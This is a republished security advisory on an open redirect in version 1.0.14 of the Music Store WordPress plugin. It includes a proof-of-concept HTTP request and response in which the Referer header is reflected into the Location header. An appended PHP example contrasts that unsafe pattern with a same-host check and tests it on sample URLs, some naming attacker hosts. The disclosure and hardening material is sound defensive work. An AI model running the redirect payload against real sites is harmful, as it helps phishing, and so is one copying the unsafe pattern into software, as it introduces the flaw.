WordPress Music Store 1.0.14 Open Redirect

2015.07.28
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

# Title: Open Redirect Vulnerability in Music Store WordPress Plugin v1.0.14
# Submitter: Nitin Venkatesh
# Product: Music Store WordPress Plugin
# Product URL: https://wordpress.org/plugins/music-store/
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601]
# Affected Versions: v1.0.14 and possibly below.
# Tested versions: v1.0.14
# Fixed Version: v1.0.15
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/
# Changelog: https://wordpress.org/plugins/music-store/changelog/
# CVE Status: None & Fresh

## Product Information:

Music Store is an online store for selling audio files: music, speeches, narratives, everything audio. In Music Store, secure payments with PayPal.

## Vulnerability Description:

Sending a request to ms-core/ms-submit.php with an HTTP Referer header causes an open redirect: the script answers with a 302 whose Location header is the Referer value.

## Proof of Concept:

Sample HTTP Request:

GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Connection: keep-alive

Sample HTTP Response:

HTTP/1.1 302 Found
Date: Fri, 05 Jun 2015 15:29:19 GMT
location: https://google.com/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

## Solution:

Upgrade to v1.0.15

## Disclosure Timeline:

2015-06-05 - Discovered. Contacted developer.
2015-06-10 - Updated v1.0.15 released
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.
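The redirect behaviour shown in the proof of concept, next to a same-host check that closes it. This is an added example, not the plugin's code and not the v1.0.15 fix; the function names, the `$site_host` parameter, the fallback URL and the sample Referer values other than the PoC's are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from the Music Store plugin.

// Pattern matching the advisory's request/response pair:
// the Referer header is copied into Location unchanged.
function redirect_target_unsafe(array $server): string {
    return $server['HTTP_REFERER'] ?? '/';
}

// Hardened form: return the Referer only when it is an http(s) URL on the
// site's own host; anything else falls back to a fixed local path.
function redirect_target_safe(array $server, string $site_host, string $fallback = '/'): string {
    $referer = $server['HTTP_REFERER'] ?? '';
    // Reject empty values, control characters/whitespace (header splitting)
    // and backslashes (browsers may treat them as '/').
    if ($referer === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $referer)) {
        return $fallback;
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;               // relative or scheme-less ("//host/") input
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;               // non-web schemes
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return $fallback;               // "https://localhost@other-host/" style URLs
    }
    if (strcasecmp($parts['host'], $site_host) !== 0) {
        return $fallback;               // exact host match only, no suffix or prefix match
    }
    return $referer;
}

// Constructed sample Referer values; the first is the one from the advisory's PoC.
$samples = [
    'https://google.com/',
    'http://localhost/shop/?product=12',
    'https://localhost.attacker.example/',
    'https://localhost@attacker.example/',
    '//attacker.example/',
];
foreach ($samples as $referer) {
    $server = ['HTTP_REFERER' => $referer];
    printf("%-38s unsafe=%-38s safe=%s\n", $referer,
        redirect_target_unsafe($server),
        redirect_target_safe($server, 'localhost'));
}
```

Only the second sample, which is on the site's own host, survives the hardened check; the rest resolve to the fallback path. Inside WordPress, `wp_safe_redirect()` applies a comparable allowed-host check before sending the Location header.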


Copyright 2024, cxsecurity.com

 
